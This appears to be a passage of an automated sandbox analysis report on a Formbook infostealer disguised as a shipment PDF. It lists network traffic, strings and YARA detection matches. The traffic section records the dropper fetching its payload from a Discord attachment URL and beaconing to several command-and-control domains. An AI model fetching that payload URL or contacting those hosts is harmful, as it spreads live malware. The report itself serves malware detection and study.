        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.10.3 (Ubuntu)Date: Wed, 13 Oct 2021 18:37:08 GMTContent-Type: text/htmlContent-Length: 178Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 18:37:41 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f93b1-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 18:37:52 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f9601-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
        Source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 00000001.00000002.299070698.00000000007DB000.00000004.00000001.sdmp, Nyedvqj.exe, 0000000E.00000002.341260604.0000000000692000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 00000001.00000002.299070698.00000000007DB000.00000004.00000001.sdmp, Nyedvqj.exe, 0000000E.00000002.341260604.0000000000692000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/
        Source: Original Shipment Doc Ref 2853801324189923,PDF.exe, 00000001.00000002.299070698.00000000007DB000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/a
        Source: Nyedvqj.exe, 0000000C.00000002.322309602.00000000007DB000.00000004.00000020.sdmp, Nyedvqj.exe, 0000000C.00000002.323669387.0000000002CE8000.00000004.00000001.sdmp, Nyedvqj.exe, 0000000E.00000002.341260604.0000000000692000.00000004.00000020.sdmp, Nyedvqj.exe, 0000000E.00000002.342777768.0000000002E18000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/895935504124612633/897863238044242010/Nyedvqjjpoxzcfrzmjpjbqe
        Source: Nyedvqj.exe, 0000000E.00000002.341260604.0000000000692000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/m
        Source: netsh.exe, 00000014.00000002.539177729.0000000003EF2000.00000004.00020000.sdmpString found in binary or memory: https://www.thesidehustler.net/epns/?wVzHJ=BRWdQ6&amp;5jz=Su3clF2JWvLFGbUo36COKrlfR2cTjWdKqgNMt2UP/l
        Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/895935504124612633/897863238044242010/Nyedvqjjpoxzcfrzmjpjbqexkpvtsgq HTTP/1.1User-Agent: lValiHost: cdn.discordapp.com
        Source: global trafficHTTP traffic detected: GET /attachments/895935504124612633/897863238044242010/Nyedvqjjpoxzcfrzmjpjbqexkpvtsgq HTTP/1.1User-Agent: asweHost: cdn.discordapp.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /attachments/895935504124612633/897863238044242010/Nyedvqjjpoxzcfrzmjpjbqexkpvtsgq HTTP/1.1User-Agent: asweHost: cdn.discordapp.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /attachments/895935504124612633/897863238044242010/Nyedvqjjpoxzcfrzmjpjbqexkpvtsgq HTTP/1.1User-Agent: asweHost: cdn.discordapp.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /epns/?5jz=Qaf9b58Tbh8Z520YhGjeYYsoKHR90rBEG3FUA1hNyjMgDr+YB08dwxAknUVnxeGDxphK&wVzHJ=BRWdQ6 HTTP/1.1Host: www.blttsperma.questConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /epns/?wVzHJ=BRWdQ6&5jz=LPVhQz/sUypmh3JEMdUjrMI+o15/eDTdWMxajLbAdDKUpS6Ve6IQQzlpFhrtZO4TJx+f HTTP/1.1Host: www.jkformationfrance.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /epns/?5jz=mhsDKEoINpIYVMaR3w2yQRX/JkzkFS4RewGVgpiBV5SQmE2lgVGX8ujA+r04PphgcB3o&wVzHJ=BRWdQ6 HTTP/1.1Host: www.bombers.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /epns/?wVzHJ=BRWdQ6&5jz=D+mEdFX82Cju9hASn9EZxxK/L4be4H1Ia6Y0NmWcI3nDoqp7HXKUHxAIP+SNGKqRa1VB HTTP/1.1Host: www.goodtasteonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /epns/?5jz=YHZU9vngEBQXtyB5u9xn7pvVN7OmBffp0F4sE7DtsKiVljOHBP+VVTECwxdgyHUha7VA&wVzHJ=BRWdQ6 HTTP/1.1Host: www.alltart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /epns/?wVzHJ=BRWdQ6&5jz=Su3clF2JWvLFGbUo36COKrlfR2cTjWdKqgNMt2UP/lm1WcuW9iVFXF9WD2RXvaQquqUk HTTP/1.1Host: www.thesidehustler.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /epns/?5jz=Uper38P2wFVpXLMvMK5jmH9wYxHR33YjEArLoikkDOyYqkQ8aA8asj2sgPC5P0zW7/vl&wVzHJ=BRWdQ6 HTTP/1.1Host: www.eimzaizmir.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.5:49731 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.5:49757 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.5:49760 version: TLS 1.2

        E-Banking Fraud:

        barindex
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0000000B.00000001.291686637.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.403434949.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.402942283.0000000000590000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000003.321247558.0000000003D30000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000000.337416597.0000000007387000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.380908074.0000000002B20000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.371020252.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.373751532.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000002.527535096.0000000000BD0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000002.532932295.0000000003630000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.302136605.0000000003D00000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000000.352491116.0000000007387000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000002.532637283.0000000003600000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.302308233.0000000003D70000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.325589114.0000000003CAC000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000001.321255326.0000000000400000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000000.337058358.0000000007387000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.368626024.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.402671981.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.405522216.0000000000D60000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000003.291200860.0000000003DAC000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.344615854.0000000003DEC000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000003.339915553.0000000003E70000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.371342896.0000000000430000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.370946797.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.369875714.0000000000690000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000001.339931194.0000000000400000.00000040.00020000.sdmp, type: MEMORY

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 17.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 17.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 18.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 18.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 17.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 17.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 17.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 17.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 18.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 18.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 18.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 18.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 17.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 17.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 18.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 18.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000B.00000001.291686637.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000B.00000001.291686637.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000012.00000002.403434949.00000000009D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000012.00000002.403434949.00000000009D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000012.00000002.402942283.0000000000590000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000012.00000002.402942283.0000000000590000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000C.00000003.321247558.0000000003D30000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000C.00000003.321247558.0000000003D30000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000D.00000000.337416597.0000000007387000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000D.00000000.337416597.0000000007387000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000013.00000002.380908074.0000000002B20000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000013.00000002.380908074.0000000002B20000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000011.00000002.371020252.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000011.00000002.371020252.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000011.00000002.373751532.00000000008E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000011.00000002.373751532.00000000008E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000014.00000002.527535096.0000000000BD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000014.00000002.527535096.0000000000BD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000014.00000002.532932295.0000000003630000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000014.00000002.532932295.0000000003630000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000001.00000002.302136605.0000000003D00000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000001.00000002.302136605.0000000003D00000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000D.00000000.352491116.0000000007387000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000D.00000000.352491116.0000000007387000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000014.00000002.532637283.0000000003600000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000014.00000002.532637283.0000000003600000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000001.00000002.302308233.0000000003D70000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000001.00000002.302308233.0000000003D70000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000C.00000002.325589114.0000000003CAC000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000C.00000002.325589114.0000000003CAC000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000011.00000001.321255326.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000011.00000001.321255326.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000D.00000000.337058358.0000000007387000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000D.00000000.337058358.0000000007387000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000B.00000002.368626024.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000B.00000002.368626024.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000012.00000002.402671981.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000012.00000002.402671981.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000016.00000002.405522216.0000000000D60000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000016.00000002.405522216.0000000000D60000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000001.00000003.291200860.0000000003DAC000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000001.00000003.291200860.0000000003DAC000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000E.00000002.344615854.0000000003DEC000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000E.00000002.344615854.0000000003DEC000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000E.00000003.339915553.0000000003E70000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000E.00000003.339915553.0000000003E70000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000011.00000002.371342896.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000011.00000002.371342896.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000B.00000002.370946797.00000000006C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000B.00000002.370946797.00000000006C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000B.00000002.369875714.0000000000690000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000B.00000002.369875714.0000000000690000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000012.00000001.339931194.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000012.00000001.339931194.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: Original Shipment Doc Ref 2853801324189923,PDF.exe, type: SAMPLEMatched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
        Source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 11.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 17.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 17.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
